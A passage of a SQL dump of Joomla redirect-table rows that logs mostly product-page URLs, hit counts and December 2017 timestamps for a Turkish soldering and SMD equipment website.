00:00:00',301),(15779,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',1,0,'2017-12-08 20:05:49','0000-00-00 00:00:00',301),(15780,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer',NULL,'','',7,0,'2017-12-08 20:17:25','0000-00-00 00:00:00',301),(15781,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,product_name?language=en-gb',NULL,'','',29,0,'2017-12-08 20:18:32','0000-00-00 00:00:00',301),(15782,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-08 20:34:55','0000-00-00 00:00:00',301),(15783,'http://3s-technologies.com.tr/index.php/tr/ueruenler/mi-300-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-08 20:54:22','0000-00-00 00:00:00',301),(15784,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',51,0,'2017-12-08 21:14:28','0000-00-00 00:00:00',301),(15785,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-12-08 21:35:54','0000-00-00 00:00:00',301),(15786,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-08 21:38:43','0000-00-00 00:00:00',301),(15787,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-100',NULL,'','',5,0,'2017-12-08 21:50:20','0000-00-00 00:00:00',301),(15788,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,mf_name',NULL,'','',3,0,'2017-12-08 22:09:22','0000-00-00 00:00:00',301),(15789,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-12-08 22:45:30','0000-00-00 00:00:00',301),(15790,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fä±rä±n',NULL,'','',1,0,'2017-12-08 22:54:00','0000-00-00 00:00:00',301),(15791,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hä±z',NULL,'','',1,0,'2017-12-08 22:54:10','0000-00-00 00:00:00',301),(15792,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hä±z',NULL,'','',1,0,'2017-12-08 22:54:34','0000-00-00 00:00:00',301),(15793,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-12-08 23:33:59','0000-00-00 00:00:00',301),(15794,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-08 23:38:53','0000-00-00 00:00:00',301),(15795,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,category_name',NULL,'','',402,0,'2017-12-08 23:57:18','0000-00-00 00:00:00',301),(15796,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',12,0,'2017-12-09 00:29:13','0000-00-00 00:00:00',301),(15797,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',241,0,'2017-12-09 00:43:15','0000-00-00 00:00:00',301),(15798,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-09 01:09:41','0000-00-00 00:00:00',301),(15799,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux',NULL,'','',20,0,'2017-12-09 01:22:27','0000-00-00 00:00:00',301),(15800,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/404',NULL,'','',6,0,'2017-12-09 01:39:59','0000-00-00 00:00:00',301),(15801,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-12-09 01:51:22','0000-00-00 00:00:00',301),(15802,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-12-09 02:16:44','0000-00-00 00:00:00',301),(15803,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-12-09 02:19:31','0000-00-00 00:00:00',301),(15804,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',1,0,'2017-12-09 02:25:18','0000-00-00 00:00:00',301),(15805,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name?language=en-gb',NULL,'','',24,0,'2017-12-09 02:35:42','0000-00-00 00:00:00',301),(15806,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name?language=tr-tr',NULL,'','',13,0,'2017-12-09 03:07:05','0000-00-00 00:00:00',301),(15807,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,`p`.product_sku?language=tr-tr',NULL,'','',23,0,'2017-12-09 03:10:11','0000-00-00 00:00:00',301),(15808,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',252,0,'2017-12-09 03:24:43','0000-00-00 00:00:00',301),(15809,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-09 03:44:35','0000-00-00 00:00:00',301),(15810,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-09 03:50:29','0000-00-00 00:00:00',301),(15811,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',27,0,'2017-12-09 04:20:04','0000-00-00 00:00:00',301),(15812,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/dirdesc/results,1-10',NULL,'','',14,0,'2017-12-09 04:51:54','0000-00-00 00:00:00',301),(15813,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',51,0,'2017-12-09 04:57:19','0000-00-00 00:00:00',301),(15814,'http://3s-technologies.com.tr/en/products/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-09 05:05:56','0000-00-00 00:00:00',301),(15815,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name',NULL,'','',23,0,'2017-12-09 05:21:52','0000-00-00 00:00:00',301),(15816,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',8,0,'2017-12-09 05:23:57','0000-00-00 00:00:00',301),(15817,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name?language=en-gb',NULL,'','',18,0,'2017-12-09 05:25:55','0000-00-00 00:00:00',301),(15818,'http://3s-technologies.com.tr/index.php/en/products/flux/by,product_name?language=en-gb',NULL,'','',15,0,'2017-12-09 05:26:54','0000-00-00 00:00:00',301),(15819,'https://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/trident-detail',NULL,'','',1,0,'2017-12-09 05:38:51','0000-00-00 00:00:00',301),(15820,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/tr/component/virtuemart/led-paneller/led-panel-sıvaustu/dirdesc?itemid=119',NULL,'','',2,0,'2017-12-09 05:44:03','0000-00-00 00:00:00',301),(15821,'https://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by?category_name&language=en-gb',NULL,'','',1,0,'2017-12-09 05:54:07','0000-00-00 00:00:00',301),(15822,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',31,0,'2017-12-09 05:56:47','0000-00-00 00:00:00',301),(15823,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,ordering?language=en-gb',NULL,'','',22,0,'2017-12-09 05:57:46','0000-00-00 00:00:00',301),(15824,'http://3s-technologies.com.tr/en/products/smd-fırın/dirdesc',NULL,'','',415,0,'2017-12-09 06:24:43','0000-00-00 00:00:00',301),(15825,'http://3s-technologies.com.tr/index.php/en/products/rh6-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-12-09 06:26:56','0000-00-00 00:00:00',301),(15826,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-12-09 06:38:13','0000-00-00 00:00:00',301),(15827,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/dirdesc/results,1-10',NULL,'','',14,0,'2017-12-09 06:41:28','0000-00-00 00:00:00',301),(15828,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-09 06:46:36','0000-00-00 00:00:00',301),(15829,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',2,0,'2017-12-09 06:47:25','0000-00-00 00:00:00',301),(15830,'http://3s-technologies.com.tr/index.php/en/products/trident-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-09 06:56:51','0000-00-00 00:00:00',301),(15831,'https://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-09 07:23:37','0000-00-00 00:00:00',301),(15832,'https://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/jvk-detail',NULL,'','',1,0,'2017-12-09 08:30:49','0000-00-00 00:00:00',301),(15833,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2017-12-09 08:31:19','0000-00-00 00:00:00',301),(15834,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku',NULL,'','',4,0,'2017-12-09 08:55:06','0000-00-00 00:00:00',301),(15835,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?category_name&language=en-gb',NULL,'','',1,0,'2017-12-09 09:47:04','0000-00-00 00:00:00',301),(15836,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',8,0,'2017-12-09 09:57:33','0000-00-00 00:00:00',301),(15837,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-12-09 09:58:22','0000-00-00 00:00:00',301),(15838,'https://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-09 10:01:34','0000-00-00 00:00:00',301),(15839,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc',NULL,'','',3,0,'2017-12-09 10:04:20','0000-00-00 00:00:00',301),(15840,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-10',NULL,'','',4,0,'2017-12-09 10:45:52','0000-00-00 00:00:00',301),(15841,'http://www.3s-technologies.com.tr/index.php/en/homepage2/79-english-uk',NULL,'','',26,0,'2017-12-09 10:51:13','0000-00-00 00:00:00',301),(15842,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-09 11:21:33','0000-00-00 00:00:00',301),(15843,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-12-09 11:54:39','0000-00-00 00:00:00',301),(15844,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-12-09 11:55:00','0000-00-00 00:00:00',301),(15845,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',24,0,'2017-12-09 12:00:58','0000-00-00 00:00:00',301),(15846,'http://www.3s-technologies.com.tr/index.php/en/products/mi-300-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-09 12:05:00','0000-00-00 00:00:00',301),(15847,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1mm-28-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-09 12:06:11','0000-00-00 00:00:00',301),(15848,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-20',NULL,'','',4,0,'2017-12-09 12:08:58','0000-00-00 00:00:00',301),(15849,'http://3s-technologies.com.tr/index.php/tr/ueruenler/e-bar-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-09 12:25:17','0000-00-00 00:00:00',301),(15850,'https://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-09 12:35:35','0000-00-00 00:00:00',301),(15851,'https://www.3s-technologies.com.tr/index.php/en/products/trident-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-09 12:43:44','0000-00-00 00:00:00',301),(15852,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,mf_name?language=tr-tr',NULL,'','',13,0,'2017-12-09 13:00:25','0000-00-00 00:00:00',301),(15853,'https://www.3s-technologies.com.tr/tr/urunler/trident-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-09 13:09:58','0000-00-00 00:00:00',301),(15854,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-09 13:18:10','0000-00-00 00:00:00',301),(15855,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name/results,1-10?language=en-gb',NULL,'','',3,0,'2017-12-09 13:45:51','0000-00-00 00:00:00',301),(15856,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/jv131-detail',NULL,'','',19,0,'2017-12-09 14:07:22','0000-00-00 00:00:00',301),(15857,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',217,0,'2017-12-09 14:14:09','0000-00-00 00:00:00',301),(15858,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by?error=404&language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-12-09 14:14:20','0000-00-00 00:00:00',301),(15859,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by?error=404&language=en-gb&product_sku',NULL,'','',1,0,'2017-12-09 14:15:25','0000-00-00 00:00:00',301),(15860,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-09 14:27:24','0000-00-00 00:00:00',301),(15861,'https://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/mi-300-detail',NULL,'','',1,0,'2017-12-09 14:34:54','0000-00-00 00:00:00',301),(15862,'http://www.3s-technologies.com.tr/tr/anasayfa/78-turkish-tr',NULL,'','',33,0,'2017-12-09 14:42:01','0000-00-00 00:00:00',301),(15863,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-12-09 15:23:43','0000-00-00 00:00:00',301),(15864,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-12-09 15:28:50','0000-00-00 00:00:00',301),(15865,'http://3s-technologies.com.tr/index.php/en/products/ess-310-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-09 15:34:30','0000-00-00 00:00:00',301),(15866,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-12-09 15:43:10','0000-00-00 00:00:00',301),(15867,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering?error=404&language=en-gb',NULL,'','',1,0,'2017-12-09 15:49:05','0000-00-00 00:00:00',301),(15868,'https://www.3s-technologies.com.tr/index.php/en/products/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-09 15:53:36','0000-00-00 00:00:00',301),(15869,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-100',NULL,'','',1,0,'2017-12-09 16:04:19','0000-00-00 00:00:00',301),(15870,'http://www.3s-technologies.com.tr/index.php/en/products/am100-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-09 16:10:04','0000-00-00 00:00:00',301),(15871,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-10',NULL,'','',2,0,'2017-12-09 17:13:32','0000-00-00 00:00:00',301),(15872,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-12-09 17:13:36','0000-00-00 00:00:00',301),(15873,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1.2mm-detail',NULL,'','',7,0,'2017-12-09 17:29:48','0000-00-00 00:00:00',301),(15874,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-09 17:36:59','0000-00-00 00:00:00',301),(15875,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',6,0,'2017-12-09 17:54:27','0000-00-00 00:00:00',301),(15876,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-09 18:22:50','0000-00-00 00:00:00',301),(15877,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by?category_name&language=en-gb',NULL,'','',1,0,'2017-12-09 18:59:50','0000-00-00 00:00:00',301),(15878,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,ordering?language=en-gb',NULL,'','',1,0,'2017-12-09 19:22:10','0000-00-00 00:00:00',301),(15879,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/dirdesc',NULL,'','',392,0,'2017-12-09 19:27:00','0000-00-00 00:00:00',301),(15880,'http://www.3s-technologies.com.tr/tr/parks-home',NULL,'','',62,0,'2017-12-09 19:34:45','0000-00-00 00:00:00',301),(15881,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/asp-300-detail',NULL,'','',7,0,'2017-12-09 19:38:03','0000-00-00 00:00:00',301),(15882,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',176,0,'2017-12-09 19:40:18','0000-00-00 00:00:00',301),(15883,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-09 19:51:54','0000-00-00 00:00:00',301),(15884,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-40',NULL,'','',3,0,'2017-12-09 20:04:18','0000-00-00 00:00:00',301),(15885,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/dirdesc?language=en-gb',NULL,'','',25,0,'2017-12-09 20:47:47','0000-00-00 00:00:00',301),(15886,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-09 21:00:07','0000-00-00 00:00:00',301),(15887,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic',NULL,'','',7,0,'2017-12-09 21:01:43','0000-00-00 00:00:00',301),(15888,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/content-modules/most-read/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',13,0,'2017-12-09 21:14:16','0000-00-00 00:00:00',301),(15889,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,mf_name?language=tr-tr',NULL,'','',24,0,'2017-12-09 21:38:24','0000-00-00 00:00:00',301),(15890,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-100',NULL,'','',2,0,'2017-12-09 21:40:18','0000-00-00 00:00:00',301),(15891,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-09 22:04:18','0000-00-00 00:00:00',301),(15892,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-20',NULL,'','',7,0,'2017-12-09 22:28:19','0000-00-00 00:00:00',301),(15893,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',25,0,'2017-12-09 22:35:56','0000-00-00 00:00:00',301),(15894,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/screen-printer/by,mf_name?language=en-gb',NULL,'','',4,0,'2017-12-09 22:40:18','0000-00-00 00:00:00',301),(15895,'http://3s-technologies.com.tr/tr/libraries/joomla/lol.php',NULL,'','',4,0,'2017-12-09 22:50:31','0000-00-00 00:00:00',301),(15896,'http://3s-technologies.com.tr/tr/libraries/joomla/css.php',NULL,'','',75,0,'2017-12-09 22:50:31','0000-00-00 00:00:00',301),(15897,'http://www.3s-technologies.com.tr/en/products/mx200lp-detail?tmpl=component&print=1',NULL,'','',39,0,'2017-12-09 23:03:38','0000-00-00 00:00:00',301),(15898,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın?language=tr-tr',NULL,'','',1,0,'2017-12-09 23:34:26','0000-00-00 00:00:00',301),(15899,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-09 23:36:23','0000-00-00 00:00:00',301),(15900,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-40',NULL,'','',3,0,'2017-12-09 23:40:18','0000-00-00 00:00:00',301),(15901,'http://www.3s-technologies.com.tr/en/products/rl132-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-12-09 23:57:10','0000-00-00 00:00:00',301),(15902,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering?language=en-gb',NULL,'','',1,0,'2017-12-10 00:03:32','0000-00-00 00:00:00',301),(15903,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-10?language=en-gb',NULL,'','',4,0,'2017-12-10 00:28:17','0000-00-00 00:00:00',301),(15904,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-10',NULL,'','',1,0,'2017-12-10 00:40:17','0000-00-00 00:00:00',301),(15905,'http://www.3s-technologies.com.tr/tr/images/pdf/l_series_automated_pick_?_place.pdf',NULL,'','',25,0,'2017-12-10 00:52:49','0000-00-00 00:00:00',301),(15906,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-10 01:04:09','0000-00-00 00:00:00',301),(15907,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-12-10 01:31:39','0000-00-00 00:00:00',301),(15908,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',51,0,'2017-12-10 01:40:56','0000-00-00 00:00:00',301),(15909,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-100',NULL,'','',4,0,'2017-12-10 01:52:24','0000-00-00 00:00:00',301),(15910,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-10 02:20:00','0000-00-00 00:00:00',301),(15911,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-10 02:28:32','0000-00-00 00:00:00',301),(15912,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/avf-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-10 02:30:42','0000-00-00 00:00:00',301),(15913,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2017-12-10 02:31:04','0000-00-00 00:00:00',301),(15914,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-12-10 02:44:07','0000-00-00 00:00:00',301),(15915,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',3,0,'2017-12-10 02:50:21','0000-00-00 00:00:00',301),(15916,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',8,0,'2017-12-10 03:01:10','0000-00-00 00:00:00',301),(15917,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',7,0,'2017-12-10 03:05:03','0000-00-00 00:00:00',301),(15918,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-10 03:38:44','0000-00-00 00:00:00',301),(15919,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',30,0,'2017-12-10 03:42:21','0000-00-00 00:00:00',301),(15920,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-12-10 04:17:35','0000-00-00 00:00:00',301),(15921,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-10 04:27:18','0000-00-00 00:00:00',301),(15922,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-50?language=en-gb',NULL,'','',4,0,'2017-12-10 04:46:46','0000-00-00 00:00:00',301),(15923,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',4,0,'2017-12-10 04:48:44','0000-00-00 00:00:00',301),(15924,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name',NULL,'','',3,0,'2017-12-10 05:15:57','0000-00-00 00:00:00',301),(15925,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',6,0,'2017-12-10 06:04:37','0000-00-00 00:00:00',301),(15926,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',5,0,'2017-12-10 06:29:16','0000-00-00 00:00:00',301),(15927,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',57,0,'2017-12-10 06:33:25','0000-00-00 00:00:00',301),(15928,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-12-10 06:51:12','0000-00-00 00:00:00',301),(15929,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-10 07:02:58','0000-00-00 